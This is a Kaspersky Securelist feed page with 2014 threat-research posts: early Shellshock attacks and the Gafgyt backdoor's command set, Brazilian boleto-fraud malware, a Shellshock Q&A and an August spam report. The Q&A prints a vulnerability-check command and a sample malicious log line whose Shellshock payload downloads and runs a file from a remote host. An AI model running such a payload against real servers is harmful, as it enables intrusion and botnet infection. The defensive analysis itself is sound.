Secure List feed for B2B

Syndicate content
Online headquarters of Kaspersky Lab security experts.
Updated: 23 hours 11 min ago

Shellshock and its early adopters

Fri, 09/26/2014 - 05:27

Shortly after disclosure of the Bash bug called "Shellshock" we saw the first attempts by criminals to take advantage of this widespread vulnerability also known as CVE-2014-6271.

The most recent attempts we see to gain control of webservers just create a new instance of bash and redirect it to a remote server listening on a specific TCP port. This is also known as a reverse-connect-shell. Here's an example of how this attack appears in a webserver logfile:

The attacker listens on IP address 195.xx.xx.101 on TCP port 3333, while the attack's origin is the IP address 94.xx.xx.131. To gain control of a server with this method, no external binaries are involved.

In another ongoing attack the criminals are using a specially crafted HTTP-request to exploit the Bash vulnerability in order to install a Linux-backdoor on the victim's server. We're detecting the malware and its variants as Backdoor.Linux.Gafgyt.

The binary contains two hardcoded IP addresses. The first one is only used to notify the criminals about a new succesful infection. The second IP address is used as a command-and-control server (C&C) to communicate directly with the malware running on the infected webserver.

The following picture shows an example on how this communication can look like:

In line 1 the malware sends a "Hello" message and tells the attacker which architecture the binary was compiled for – here it's x86.

Independently of commands sent by the attackers, the backdoor sends a "PING" request every 30 seconds, which is answered with a "PONG" from the server (for better readability we've removed REMOVED is much better (S.O.) --> some of PING/PONG-pairs from the example above).

Commands always start with "!* ". The first command we see in this example is the "SCANNER ON" command in line 10. This tells the binary to scan random IP ranges for hosts accepting telnet connections on TCP port 23. When such a host is found, it tries to login using a hardcoded list of common default user/password combinations.

There is also a rudimentary honeypot fingerprinting routine implemented, which makes use of "busybox" as described by the Internet Storm Center here.

The next task the criminals start on the victim's box is initiated in line 14. Here the binary is told to perform flooding of IP 69.xx.xx.67 using UDP for 50 seconds. In line 17 the attackers stop the flooding in order to restart it in line 18, now targeting 178.x.x.241. The "None Killed." reply in line 21 appears because the flooding instruction from line 14 was already finished when the attacker tried to stop it using "!* KILLATTK" in line 17.

Here's the complete list of commands the backdoor accepts:

!* PING – Replies with "PONG!"
!* SH - Execute arbitrary shell command
!* GETLOCALIP – Replies with "My IP: $ipaddr"
!* SCANNER ON | OFF - Scan random networks, perform a very small dictionary attack (see above), test if target is a honeypot

!* HOLD - Hold flooding
!* JUNK – Perform junk flood
!* UDP – Perform udp flood
!* TCP – Perform tcp flood
!* KILLATTK - Kill all flood
!* LOLNOGTFO – Terminate backdoor.

Related binaries:

73b0d95541c84965fa42c3e257bb349957b3be626dec9d55efcc6ebcba6fa489
2d3e0be24ef668b85ed48e81ebb50dce50612fb8dce96879f80306701bc41614
ae3b4f296957ee0a208003569647f04e585775be1f3992921af996b320cf520b

 

0fde4c72038189e3d86676d84a1370787bcd284f98d1dff7736707fe05af7d9a
3b13eef9b24919dc7e7071068a83defcc4808a41dc86fadf039e08dce1107f7d
64b3751182be737c005fb04ffbe8b4dfe5930ed46066e87a9f6344de1d9985b8

 

Attacks against Boletos

Fri, 09/26/2014 - 02:00
Introduction

José is a very suspicious person. He never uses internet banking services or buys anything using a credit card. Indeed, he doesn't even have one. He doesn't trust any of these modern technologies in the slightest. He's well aware of all the risks that exist online, so José prefers to keep his life offline.  However, not even that could save him from today's cybercriminals. He lost more than $2,000 in a single day: José was p0wned by a barcode and a piece of paper.

Brazilian crooks created a unique way of stealing money from these cautious, offline-only types: changing "boletos", popular banking documents issued by banks and all kind of businesses in Brazil. Boletos are actually one of the most popular ways to pay bills and buy goods in Brazil – even government institutions use them – and they are a unique feature of the Brazilian market.

In a series of online attacks targeting flaws on network devices – especially DSL modems – and involving malicious DNS servers, fake documents, browser code injections in the style of SpyEye, malicious browser extensions and a lot of creativity, the crooks have successfully stolen vast amounts of money, even from people who don't have credit cards or Internet banking accounts. It's a new worry for banks and financial institutions in the country.

This article explains how these attacks have happened in Brazil, and gives advice on protecting customers even when they have chosen to live offline.

Boleto bancário: the Brazilian payment system

Boletos are a very popular and easy way to pay bills or buy goods in Brazil today; even online stores will accept this kind of payment. All you need to do is print and pay it. According to the Brazilian Central Bank 21% of all payments in the country in 2011 were made using boletos.

Preferred payment methods in Brazil in 2011

According to e-bit 18% of all e-commerce transactions in Brazil in 2012 used boletos as the preferred payment method:

Preferred online payment method in Brazil in 2012

A boleto comes with an expiry date. Before that date it can be paid in at ATMs, branches and internet banking of any Bank, the Post Office, Lottery Agents and some supermarkets until its due date.  After the date it can only be paid at a branch of the issuing bank. The client also pays a fee levied by the bank; the fee increases with every passing day. Banks charge a handling fee for every boleto paid in by a customer. This fee varies from BRL 1,00 to BRL 12,00, depending on the bank. If the collection is registered then the bank will also charge a fee for every issued boleto, regardless of whether it was paid or not. Therefore, unregistered collections are more suitable for online transactions.

The bank also takes into account the size of the client, so a client with a higher volume of banking transactions, who has been working with the bank for a while, etc, is able to get lower fees or even fee exemption, which made the boleto a very important sales tool inside big companies, e-commerce and the government. If a company want to do business in Brazil, it essential to use boletos – Apple, Dell, Skype, Microsoft, DX.com, Alibaba.com, and even FIFA in the 2014 World Cup used it in local operations.

Buying Skype credits with boleto bancário as a payment method

This is the basic structure of a printed boleto bancário:

Boleto bancário for beginners according TheBrazilBusiness.com

  • Issuer Bank: the financial institution responsible for issuing and collection based on an agreement between itself and the merchant. The bank, once authorized to collect payment for the merchant, will credit the amount owed by the client in the merchant's bank account.
  • Identification Field: a numerical representation of the barcode, it contains all the information necessary to identify the merchant's bank account and clear the payment. This field is used in home and self-service banking.
  • Barcode: a code consisting of a group of printed and variously patterned bars (always 103mm in length and 13mm in height) and spaces and sometimes numerals that is designed to be scanned and read by a digital laser scanner and that contains information to identify the object it labels.

To pay a boleto at the bank or online all that is necessary is to scan the barcode – if it's unreadable (due to a bad print) users can type in the 44-number identification code instead. Some banks have a barcode scanner in their mobile apps, so mbanking users don't need to type the ID field; they can pay the boleto using their device's camera.

Paying a boleto using a barcode scanner

What could possibly go wrong? Well, how about changing the barcode or the ID field? It's simple and means payments can be redirected to another account. That's exactly what Brazilian fraudsters started to do – and the easiest and effective way was using malware.

The Brazilian boleto malware

A boleto can be generated and printed by the store that is selling its products to you, or even by users themselves during an online purchasing process. It's displayed in the browser, generally in HTML mode, using free libraries available for developers to implement in their ERP software or in their online store system.

BoletoPHP is a free resource for developers to generate boletos using PHP

The extensive documentation and legitimate open source software used to generate boletos helps malware creators to develop Trojans which are programmed to change boletos locally, as soon as they are generated by the computer or browser. These Trojans were spotted in the wild in April 2013 by LinhaDefensiva.com and are still being distributed in Brazil today. In fact most of the Brazilian criminals who use Trojan bankers to steal money are migrating their attacks to target boletos, using the same infrastructure.

The first generations chose to change the ID field number and the barcode:

A boleto modified by a Brazilian Trojan: the new ID number and barcode redirect the payment to the fraudster's account

Some versions of the malware use a JavaScript injection to change the content of the boleto:

"CodBarras" means barcode in Portuguese

Some later versions of this Trojan appeared and started to change only the numbers in the ID field:

"Linha Digitável" means typeable line in Portuguese; it's the ID field number

These new versions also used a span HTML element in order to add a white space to the barcode, making it unreadable. That forces the customer or bank staff to type the doctored 44-digit ID field to pay the boleto. So as not to raise suspicions, the Trojan does not change the value and due date for the transaction:

HTML page changed by the Trojan, adding a white space to invalidate the barcode, source LinhaDefensiva.org

The ID field includes a lot of information, detailing the bank account that will receive the payment and other data used according to the rules established by each bank. The "Nosso Número" data ("Our ID Number") is a unique identifier, different for each boleto. Changing the ID number is enough to redirect the payment to another bank account.

Understanding the ID field on boletos

Since most boletos are now generated in a browser, the Trojan targeting Internet Explorer users installs a BHO ready to communicate with a C&C and monitor traffic, looking for words such as "boleto" and "pagamento" (payment), choosing the right moment to inject the code and replacing the ID number stored in HTML with a new one, downloaded from the C&C.

It's like SpyEye: code injection in the browser's section

Initially most of these BHO had a very low detection rate, incorrectly flagged as Trojan banker by normal antimalware products (e.g the MD5s 23d418f0c23dc877df3f08f26f255bb5 and f089bf60aac48e24cd019edb4360d30d). One example of a request made by these BHOs and a response with a new ID number to be injected:

Request: http://141.105.65.5/11111.11111%2011111.111111%2011111.111111%201%201111111111
Response: 03399.62086 86000.000009 00008.601049 7 00000000000000

Compromised websites may also host scripts that generate the new ID number for these boletos:

Or something design to inject not only a new ID number but a new barcode as well:

We also found very professional control panels used by the fraudsters to collect data from infected machines and register every boleto as soon as it is generated. It's the same infrastructure used in the development of Trojan bankers, as a fraudulent boleto is a new way to steal money from the users.

A bad guy's control panel to control infected machines

Some of the panels offer a lot of details to the crooks, such as the date/hour the boleto was generated/changed, the old ID field and the replacement injected by the malware, the value and the origin – where the boleto was generated, if it was local or on a website.

Another boleto malware panel

Right now it's really easy to find places where wannabe cybercriminals can buy this toolkit and start their own attacks on boletos. A starter pack costs about R$ 500.00 (around US$ 250)

"Only for connoisseurs", the boleto kit malware + panel for sale on Facebook

The Zeus link – encrypted payloads

The boleto malware campaigns combined several new tricks to infect and steal from more users. One of the most recent is the use of non-executable and encrypted malware payloads XORed with a 32-bit key and compressed by ZLIB, using the extensions .BCK, .JMP, .MOD and others.

Encrypted .JMP file downloaded by the boleto malware

It's no coincidence that the same technique was used by the ZeuS GameOver gang. We have evidence of Brazilian criminals cooperating with western European gangs involved with ZeuS and its variants; it's not unusual to find them on underground forums looking for samples, buying new crimeware and ATM/PoS malware. The first results of this cooperation can be seen in the development of new attacks such the one targeting payments of boletos in Brazil.

Using encrypted payloads offers the criminals an effective way to bypass any firewalls, webfilters, network intrusion detection systems or other defenses that may be in place, as a tiny Trojan downloads these encrypted files and decrypts them to complete the infection.

Decrypted .JMP file: a normal PE executable

Intercepting SSL conections

Another interesting approach seen in boleto malware is the role of Fiddler, a web debugging proxy tool normally used by malware researchers. Some boleto malware uses it to intercept SSL traffic or to do a MitM, aiming to change boletos generated even in HTTPS pages.

We found this behavior in samples such as Trojan.Win32.Badur.imwt:

Boleto Trojan programmed to use Fiddler: MitM in SSL pages

The malware installs SSL certs from FiddlerCore on the infected machine and captures the traffic of HTTPS pages.

Certificate of Fiddler installed by the malware

Attacks against network devices

Investigating the attack vector used by the fraudsters and looking at how the victims got infected we found that all possible techniques are used. Social engineering attacks via well designed e-mail campaigns are the most widespread, but the most aggressive path includes the massive use of RCE on vulnerable DSL modems – in 2011/12 more than 4 million of these devices were attacked in Brazil and had their DNS settings changed by cybercriminals – the same approach is still being used to distribute this malware today.

When an affected user tries to visit popular websites or Brazilian web portals the malicious DNS configured in the DSL modem offers to install a new Flash Player. In reality, accepting this installation will infect the machine with boleto malware.

Is Google.com hosting a Flash Player installer? Nope, it's the malicious DNS in the DSL modem

Another recent move from Brazilian criminals was to spread web-based attacks against home-routers in an attempt to change the DNS of the device. These attacks were called "drive-by-pharming". It can be spread via malicious domains or by compromising popular websites:

News website "Estadão" compromised: the malicious script asks the password of your home router

The malicious script tries to guess the password of your home router. If it succeeds a new DNS server will be configured in the device and the criminals will control all your traffic. If it fails the compromised site will display a box asking for your credentials.

Is the password of your router gvt12345? Just guessing…

Recently we identified more than 30 malicious DNS servers being used in these attacks in Brazil. What does the new DNS server do? It redirects users' connections, serving phishing pages or even fake banking pages that modify every boleto the user generates.

If criminals combine web-based attacks with advertisements they can reach millions of people. This tactic is already being used:

What's the fastest way to attack home routers in Brazil? Using advertising

If the criminals can't compromise your network device, they'll target the ISP. We have already seen a series of DNS poisoning attacks against Net Virtua, one of the biggest Brazilian ISPs. Every time the aim is the same, targeting boletos.

But there was worse to come when cybercriminals decided to move to a more online approach…

Fake websites, fake extensions, fraudulent boletos

Some fraudsters decided that spreading their Trojans wasn't enough. They wanted faster returns and changed their tactics. They looked online, investing in sponsored links, fake websites that claimed to recalculate expired boletos (this is possible with this payment system) and malicious browser extensions for Google Chrome or Firefox.

Malicious Chrome extensions, in the official Store

One attack started with a message promising 100 minutes free Skype credit:

Skype-To-Go free for Chrome users! It's easy, just install an extension…

Why distribute a Trojan when you can trick users into installing a malicious browser extension that controls and monitors all the traffic? That's exactly what the fraudsters did, with the valuable help of the official Google Chrome Web Store, where the malicious extension was hosted:

Trojan-Banker.JS.Banker.bv

And this wasn't the only one, we found more:

Trojan-Banker.JS.BanExt.a, found on June 2014 in the Store, almost 2,000 users installed it

And one more, disguised as financial app that generates (fake) boletos:

Trojan-Banker.JS.Banker.bx, more than 3,800 installations…

The extension was prepared to just like a BHO on an infected machine: monitor and wait for the moment a boleto is generated, and then communicate with a C&C…

Trojan-Banker.JS.Banker.bw

…and receive a new ID field number, injecting it in the boleto while invalidating the barcode:

To disguise any intent to discover the real purpose of the extension there was some obfuscation of the main .JS file inside the .CRX file:

HEXed JavaScript file

After removing the obfuscation we can see the websites it's targeting:

The list includes big Brazilian backs and well-known online stores such as Americanas.com and PagSeguro (a service similar to Paypal). Customers of small banks did not escape from the attack – malicious extensions are set up to target a long list of local banks:

The huge number of malicious extensions prompted Google's decision at the end of May 2014 to limit the installation of Chrome extensions. Now they can only be hosted on the Chrome Web Store, but it is no problem for cybercriminals to put their malicious creations there.

Forcing the developer mode on Google Chrome

One example is Trojan-Banker.Win32.ClearWind.a. Its main target is to install a malicious extension that changes boletos, activating the developer mode on Google Chrome and forcing the installation of any extension, even those not hosted in the official store:

"Developer mode" activated on Chrome. The malware did it

These Trojans were able to infect a lot of people, installing the malicious extension to change boletos:

Trojan-Banker.Win32.ClearWind.a, more than 8,000 installations

Malicious Firefox add-on

But if you use Firefox, you're still at risk; there is a version of a malicious add-on for these users as well:

For bad guys' convenience, the malicious Firefox add-on is hosted on Google Storage:

Trojan-Banker.JS.Banker.cd ready to install a malicious addon to change your boletos

Sponsored links, fake websites

Other interesting characteristic of boletos is that you can generate a counterpart copy, in case you lose the original one. Some banks also offer a service to customers who missed the payment deadline and need to recalculate the value of an expired boleto and reissue it, after paying a small fee. All companies working with boletos offer these services to their customers, generally online, and cybercriminals can attack here as well.

The fraudsters decided to set up malicious websites that claim to offer re-issues or recalculations of expired boletos – but of course the new boleto is totally fake and redirects the payment to the criminals' account. These attacks are carried out with the help of search engines, buying up sponsored link campaigns and putting their fraudulent sites to the top of the results.

In a search for "calcular boleto vencido" (recalculate expired boleto) or "segunda via boleto" (counterpart copy) on Google, the first result is a fraudulent service:

Google isn't the only one – it's the same on Yahoo:

And Ask.com:

Not forgetting Bing:

The fake websites that supposedly offer these services have a very professional design to help trick their victims.

All you need to do is choose the bank that issued the boleto, type in the data and "reissue" it.

Of course the boleto generated has the exact same value and due date you asked for, but the ID field number has new data…

"Your new boleto was generated and registered. Pay it today"

It's not just malware: the boleto gangs are using all the possible ways of tricking users and stealing their money. A very widespread attack such this one resulted in many victims.

Online and offline victims

These attacks were especially notorious for their "crossover" to the offline world, stealing from people who do not use internet banking or buy things online. It can even steal from people who have never connected to the Internet in their lives. Several infected computers in thousands of stores all over the country started to generate fraudulent boletos for their customers. Once printed and paid they sent the money directly to the cybercriminals' accounts.

This sparked a real avalanche of Trojans using the same technique, and several businesses were badly affected. Many companies, the association of shopkeepers and the Brazilian government all issued alerts to their customers about the fraudulent boletos issued by these trojans (e.g. 1, 2, 3, 4). A lot of money was stolen and even now this fraud is costing banks, stores and customers dear.

Some cases draw our attention such this one of a businesswoman from Campo Grande – her company lost BRL 183,000 (around US$80,000):

That sum was stolen in just 3 days…

The Police Department in the state of Minas Gerais issued an alert to residents, warning that fraudsters had already stolen around BRL 25,000 (US$ 10,000) from businesses:

The police registered 12 cases in the state

To measure the problem we did the sinkhole of a C&C and found several victims – in only one malicious server the logs registered more than 612,000 requests in 3 days. Each one sought a fraudulent ID field to be injected into boletos generated on the infected machines:

Requests to a sinkholed C&C

Looking at these values led us to ask: how much money was stolen? How many victims? It's not easy to get this number if you do not thoroughly understand the Brazilian cybercrime environment.

8 billion?

In July 2014 several media outlets covered some RSA research about a "Cybercrime Scheme Uncovered in Brazil" – those attacks against boletos. Right from the start it offers a shocking figure: possibly as much as US$3.75 billion stolen, BRL 8.6 billion. In other words, it would have been the largest cybercrime heist known to date. To compare how big this number is, Banco do Brasil, the biggest bank in the country, makes US$ 6.6 billion in annual profits. So the bad guys stole half of the money from a big bank? Not so fast…

RSA found 495,793 boletos and 192,227 victims in their investigation. Once inside the control panel, they found the values of all payments that the virus had redirected. Added together, those payments topped the US$3.75 billion mark. This figure, however, includes everything – payments not made and payments that were made but not authorized by the bank (as the fraud was detected).  It also includes any test payments made by other researchers trying to understand the malware behavior or even tests made by the bad guy, or even duplicated entries as some customers tried to generate the same boleto several times.

A C&C displaying testing and duplicated entries

Counting every entry in a C&C resulted in this absurd number of R$ 8 billion, which averages at R$ 16,000 for each boleto. This value is unreal and incorrect — most boletos are worth far less. They also estimated a number of victims at 192,227. They did this by counting unique IP address, which is very unreliable. As in other parts of the world, most connections in Brazil use dynamic IP addresses. Other errors in the RSA report were highlighted by the LinhaDefensiva community in this article.

So how much was really stolen with fraudulent boletos? In reality only the banks can suggest a final total. The Brazilian Federation of Banks (FEBRABAN) publishes the combined losses faced by all banks due to electronic fraud each year. The year with the most losses so far was 2011. That year, they lost R$ 1.5 billion, or US$ 680 million.

One thing is certain: Brazilian cybercriminals are moving fast, adopting new techniques to continue attacking and stealing money from boletos. They would not waste their time if the scam was not profitable for them.

How to protect you and your company

This is a common question from users and businesses in Brazil working with boletos. Is it possible using this payment method securely?

FEBRABAN, the Brazilian Federation of Banks, suggests using DDA (Debito Direto Autorizado, Authorized Direct Debit). This replaces a printed boleto with an electronic bill, automatically withdrawing funds from another person's bank account after both parties pre-authorize the deal.

However some Brazilian companies are concerned by the higher costs associated with DDA. In this case we advise issuing boletos in a PDF format generated on the server-side, instead of using HTML format. At present no Trojan can modify a PDF boleto.

Boleto generated in PDF format: more secure than HTML

Kaspersky Lab customers are protected against these attacks – the Safe Money technology presented in our products can block it entirely by offering the option of opening pages in a safe mode where no malicious code could inject data. This ensures that boletos can be generated securely:

Kaspersky Fraud Prevention platform also stops Trojans designed to capture HTTPS traffic using Fiddler. KFP compares this fake certificate of Fiddler with the real certificate used by the Bank or payment service and then blocks access.

Kaspersky Fraud Prevention in action, blocking an unreliable SSL connection

Conclusions

Today these attacks are a big headache for everyone involved in buying and selling in Brazil – banks, businesses and customers alike. When a customer is hit with a fake boleto he says it's not his fault because he paid. The stores blame the bank for failing to process the payment properly. The bank insists it is only responsible for processing the boleto, not for the content of the paperwork. The buck goes round and round …

To complete the scenario Brazilian criminals specialize in identity theft. They often open banking accounts in the name of innocent people who know nothing of the situation, using stolen personal data. With money mules and accounts opened in the name of dead people; it's easy to see why it's so difficult to track stolen money.

Boletos are a very local and distinctive payment method; most other countries don't have anything similar and don't even know what a boleto is. Unfortunately security companies pay little attention to Brazil and miss a lot of issues that only local intelligence can detect and offer expertise. Local criminals are strictly limiting their attacks to Brazilian IPs and only install their Trojans on machines operating in Brazilian Portuguese.

Brazilian cybercriminals are following the same path as their counterparts in Russia and China, with a very specialized cybercrime scene where attacks on locals require special effort to understand properly. They are also sharing knowledge with cybercriminals from Eastern Europe, exporting new techniques such this one described here, clearly inspired by SpyEye, to do code injection.

"Bash" (CVE-2014-6271) vulnerability – Q&A

Thu, 09/25/2014 - 09:45
What is the "bash" vulnerability?

The "bash" vulnerability, actually described as CVE-2014-6271, is an extremely powerful vulnerability due to its high impact and the ease with which it can be exploited. An attacker can simply execute system level commands, with the same privileges as the affected services.

In most of the examples on the Internet right now, attackers are remotely attacking web servers hosting CGI scripts that have been written in bash or pass values to shell scripts.

At the time of writing, the vulnerability has already been used for malicious intentions – infecting vulnerable web servers with malware, and also in hacker attacks. Our researchers are constantly gathering new samples and indications of infections based on this vulnerability; and more information about this malware will be published soon.

The key thing to understand is that the vulnerability is not bound to a specific service, for example Apache or nginx. Rather, the vulnerability lies in the bash shell interpreter and allows an attacker to append system level commands to the bash environment variables.

How does it work?

I will use the same examples that we have seen in the advisories and proof-of-concept code that have been published,to explain how it works. When you have a CGI script on a web server, this script automatically reads certain environment variables, for example your IP address, your browser version, and information about the local system.

But just imagine that you could not only pass this normal system information to the CGI script, but could also tell the script to execute system level commands. This would mean that – without having any credentials to the webserver – as soon as you access the CGI script it would read your environment variables; and if these environment variables contain the exploit string, the script would also execute the command that you have specified.

What makes it unique?

This vulnerability is unique, because it's extremely easy to exploit and the impact is incredibly severe – not least because of the amount of vulnerable targets. This does not just affect web servers, it affects any software which uses the bash interpreter and reads data which you can control.

Researchers are also trying to figure out if other interpreters, such as PHP, JSP, Python or Perl, are also affected.  Ddepending on how code is written, sometimes an interpreter actually uses bash to execute certain functions; and if this is the case, it might be that other interpreters could also be used to exploit the CVE-2014-6271 vulnerability.

The impact is incredibly high because there are a lot of embedded devices that use CGI scripts – for example routers, home appliances and wireless access points.  They are also vulnerable and, in many cases, difficult to patch.

How widespread is it?

This is very difficult to say, but we know from our intelligence systems that people started to develop exploits and worms directly after the vulnerability information was published – both whitehat and blackhat researchers are scanning the Internet for vulnerable servers.

It is too early to know how widespread this is, but I know from my own research that there are a great many web servers running CGI scripts, and I am pretty sure that we will also see a lot of other types of exploits being developed that target local files and network daemons. There have been discussions regarding both OpenSSH and dhcp-clients being vulnerable to this attack as well.

How do I check if my system/web site has been affected?

The easiest way to check if your system is vulnerable is to open a bash-shell on your system and execute the following command:

"env x='() { :;}; echo vulnerable' bash -c "echo this is a test"


If the shell returns the string "vulnerable", you should update your system.

Also there are tools for the technical audience out there that can be used to verify if your server is affected by this vulnerability.

Advice on how to fix this problem

The first thing that you need to do is to update your bash version.  Different Linux distributions are offering patches for this vulnerability; and although not all patches have been proven to be completely effective, patching is the first thing to do. Services like Heroku pushed out fixes that will auto-apply within 24 hours, but developers can force the updates too.

If you are using any IDS/IPS I would also recommend that you add/load a signature for this. A lot of public rules have been published.

Also review your webserver configuration.  If there are any CGI scripts that you are not using, consider disabling them

Is there threat to online banking?

This vulnerability is being actively exploited to target servers hosted on the Internet. Even some workstations running Linux and OSX are vulnerable, but an attacker would still need to find an attack vector that will work remotely against your desktop. Proof of concept targeting *nix workstation dhcp clients has been released, but most workstation dhcp process policies prevent actions from this sort of exploit by default.

Exploit attempts that we observed are targeting server vulnerabilities and downloading DDoS bots for further DDoS attacks. It is likely that servers hosting PII and handling sensitive merchant data are being attacked as well, but we have not yet observed it. There are merchants that unfortunately do not patch quickly.

Can I detect if someone has exploited this against me?

We would recommend reviewing your HTTP logs and check if there is anything suspicious. An example of a malicious pattern:

192.168.1.1 - - [25/Sep/2014:14:00:00 +0000] "GET / HTTP/1.0" 400 349 "() { :; }; wget -O /tmp/besh http://192.168.1.1/filename; chmod 777 /tmp/besh; /tmp/besh;"


There are also some patches for bash that log every command that is being passed to the bash interpreter. This is a good way to see if someone has exploited your machine. It won't prevent someone from exploiting this vulnerability, but it will log the attackers actions on the system.

How serious is the threat?

This bug is very dangerous indeed, but not EVERY system is vulnerable. Special conditions must be met for a web server to be exploited. One of the biggest problems now is that when patches are published, researchers will look for other ways to exploit bash, explore different conditions that enable it to be exploited, etc. So a patch that helps prevent remote code execution can't do anything against, for example, a file overwrite. So there will probably be a series of patches and in the meantime systems are still vulnerable.

Is it the new Heartbleed?

Well, it's much easier for a cybercriminal to exploit than Heartbleed. Also, in the case of Heartbleed, a cybercriminal could only steal data from memory, hoping to find something interesting.  By contrast, the bash vulnerability makes full system control much more possible. So it would seem to be more dangerous.

Can it be used in future APT attacks?

It could be used for future malware development, of course. Malware could be used to automatically test infrastructure for such a bug, to infect the system or attack it in some other way.

Spam in August 2014

Thu, 09/25/2014 - 06:00
Spam in the spotlight

In August, fraudulent emails exploited global political events and the names of famous people in the Russian Federation. Malicious files were spread via email, including ones that imitated court summons. Spammers who earn money by advertising medications used popular services to attract the attention of recipients. Spammers also actively advertised travel services and collection agencies.

Malicious court summons

In August we registered several mass mailings imitating court summons in various languages. The English-language version informed that the user was being taken to court and should study the case materials to help lodge a defense. Those materials were supposedly in an attachment, which actually contained the Trojan Backdoor.Win32.Kuluoz capable of downloading and running other malware on the victim computer. By comparing several emails from a single mass mailing we confirmed that some details, such as the time, date and venue of the hearing and the names of the archives of malicious files varied from email to email. The sender addresses had been generated from a single template in which the scammers simply entered the words from a pre-determined list. The changes in the text to were intended to provide more individuality and bypass spam filtering.

As well as the English-language versions, similar malicious spam appeared in Russian and Czech. The scammers tried to convince users that they had unpaid debts due within 15 days. If they didn't pay, recipients were warned that their property could be confiscated and their bank accounts frozen.The attached archive contained Trojan-Downloader.Win32.Agent.heva, a malicious file presented by the fraudsters as financial and legal documents. Once the user ran the Trojan, an RTF file was displayed while the malicious program was downloading and installing Trojan.Win32.Tinba.ei, yet another Trojan designed to steal financial information such as bank account credentials and credit card data. The name of the Trojan is an acronym of 'Tinybanker'. This is a small piece of assembler code, but it has the functionalities of many larger pieces of similar malware.

Politics in "Nigerian" spam

In August, we again came across "Nigerian letters" exploiting the events in Ukraine. In the email written in English the scammers used the name of the former President of Ukraine Viktor Yanukovych to sell their story. This time the popular "Nigerian" trick of asking for help in investing money for a substantial reward came from a former financial adviser to the President, whose money had been secretly transferred to the adviser's personal account in London.

After a long silence the name of Mikhail Khodorkovsky was back again. We came across "Nigerian letters" supposedly written on behalf of his inner circle. To trick readers, the fraudsters spun the standard story offering a reward for assistance in transferring and investing huge sums of money. To make the email look more realistic, the body of the message contained the links to official articles about Khodorkovsky. In addition, it was emphasized that all future transactions were legal and did not present any risk to the victim.

One email provides minimal information, simply asking recipients to contact the scammers if they finds the offer interesting. Another email provides details of a tempting offer and stories from Khodorkovsky's life: before the arrest he couldn't withdraw all money out of Russia and now, after the release, he intends to complete the transfer. However as the disgraced billionaire cannot use his former company to do this, he is looking for someone to help him. Interestingly, "Nigerian" scammers enable recipients to unsubscribe from their mailing list by sending an email to the link at the end of the message. This is how the fraudsters collect a database of active e-mail addresses for the future spam mass mailings.

Medication adverts in fake Google Play emails

Spam messages advertising medications regularly offer pills to lose weight, enhance potency or improve the male sex drive. The body of these emails includes a short text with a link to a website of a store where the advertised product can be bought. Sometimes there is just a link. To send out "pharmaceutical" adverts, the fraudsters often use visual spam. However we sometimes see quite unusual tricks to advertise meds. For example, last autumn we wrote in our blog about a series of mailings which used the names of well-known companies and looked just like typical phishing messages. In August 2014, we noted another similar mass mailing.

This time the phishing email looked like a purchase notification from the Google Play app store. To convince the recipient that the email was genuine, the spammers utilized a realistic-looking sender address as well as the store's official logo. Links in the body text of the email, which often lead to pages on the real website, were inactive this time, even though they were highlighted. It seems that the scammers did not think their fake notifications would get through the spam filters so they made their emails look like classic phishing emails.

Spammers' Indian summer

The English-language segment of the Internet saw spam mass mailings offering special offer tours to Hawaii or Costa Rica or tropical forests, as well as the chance to book a private jet for business or pleasure. These messages came from various addresses and contained the links to newly created sites where users could compare the prices and select the most attractive offer.

We also noted mailings offering to participate in earn-online programs. These so-called binary options, offering quick and easy income to cover all the costs of the vacation advertised elsewhere.

How (not) to repay a loan

Another common theme in August's spam was debt managements for individuals and companies. Spammers send out colorful messages urging things like "Only pay what you can afford" and promised to wipe out crippling debts. The hyperlink in the email led to a newly created blank site with a name like "Zero-debt-now" with offers of consolidated loans (i.e. to get one credit for paying several others) or favorable credit terms.

Various collection and private lawyers, meanwhile, offer the opposite: specialized services to collect unpaid debts without slow and costly court proceedings. The advertising emails provided a brief description of the activities of the organization, the details of its work, a few statistics (number of collected loans, the number of satisfied customers, etc.) and included a contact phone number. The digits in the telephone numbers were often deliberately distorted or noised to bypass spam filters. The authors of the messages promised a successful outcome even in cases where other specialized services already have failed.

Statistics The percentage of spam in email traffic

Percentage of spam in email traffic

The percentage of spam in August's email traffic averaged 67.2%, which is only 0.2 percentage points up from July. The amount of unsolicited email increased throughout the month – in early August the percentage of spam averaged 64.9% while in the end it reached 70.4%.

Sources of spam by country

In August, the USA remained the most popular source of spam (15,9%), up 0.7 percentage points from the previous month. Russia was in second place with 6%; up 0.4 percentage points. China was in third place with 4.7% having produced 0.6 pp less spam than in July.

Sources of spam around the world

Vietnam was in 4th position with 4.7% of all distributed spam; its contribution grew by 1.2 pp which pushed this country up four places in the rankings. It is followed by Argentina (4.4%) which saw little change in its numbers and dropped one place in the table.

Germany (3.6%) remained in 6th place with a slight decrease in the percentage of distributed spam. Ukraine dropped to 8th. Meanwhile, Brazil (2.9%) added 0.5 pp to its previous month's contribution and placed 9th in August's Top 10, which was rounded up with India (2.8%).

Of note is the slight growth of spammer activity in South Korea (1.9%) which also entered the Top 20 in August.

Malicious attachments in email

The graphic below shows the Top 10 malicious programs spread by email in August.

The Top 10 malicious programs spread by email

In August Trojan.JS.Redirector.adf topped the rating of malicious programs most often spread via email. Its name speaks for itself: it is an HTML page containing code that redirects users to a scammer site offering downloads of Binbot, a popular service for automatic online sales of binary options. This malicious program is distributed via email in a ZIP archive which is not password-protected.

Trojan-Downloader.Win32.Upatre.to and Trojan-Downloader.Win32.Upatre.tq were in 3rd and 6th places. These malicious programs are relatively simple, are no more than around 3.5 Kb in size and usually download a Trojan banker from the family known as Dyre/Dyzap/Dyreza. The list of financial organizations targeted by this banker depends on the configuration of the file which is uploaded from the command center.

Trojan-Banker.Win32.Fibbit.rq was fourth. This banking Trojan embeds in Java applications for online banking targeting authentication data and other information, such as keys, transaction replacements and their results.

Backdoor.Win32.Androm.enji and Backdoor.Win32.Androm.erom were fifth and ninth in the ranking. Both malicious programs belong to Andromeda – Gamarue, a universal modular bot with features including downloading, storing and running executable files, downloading DLL (without saving on the disk) and plugins as well as the possibility of self-updating and self-deleting. The functionality of the bot can be expanded using a system of plugins that are loaded by the criminals as required.

Trojan.Win32.Bublik.clhs and Trojan.Win32.Bublik.bwbx, modifications of the notorious Bublik malware, ended in 7th and 8th positions in August. The Bublik malware family is mostly used for the unauthorized download and installation of new versions of malware onto victim computers.

Trojan-Spy.Win32.LssLogger.bos rounded off the Top 10. It is a multifunctional malicious program which is capable of stealing passwords from a wide range of software. All stolen information is then passed to the fraudsters via email.

Distribution of email antivirus detections by country

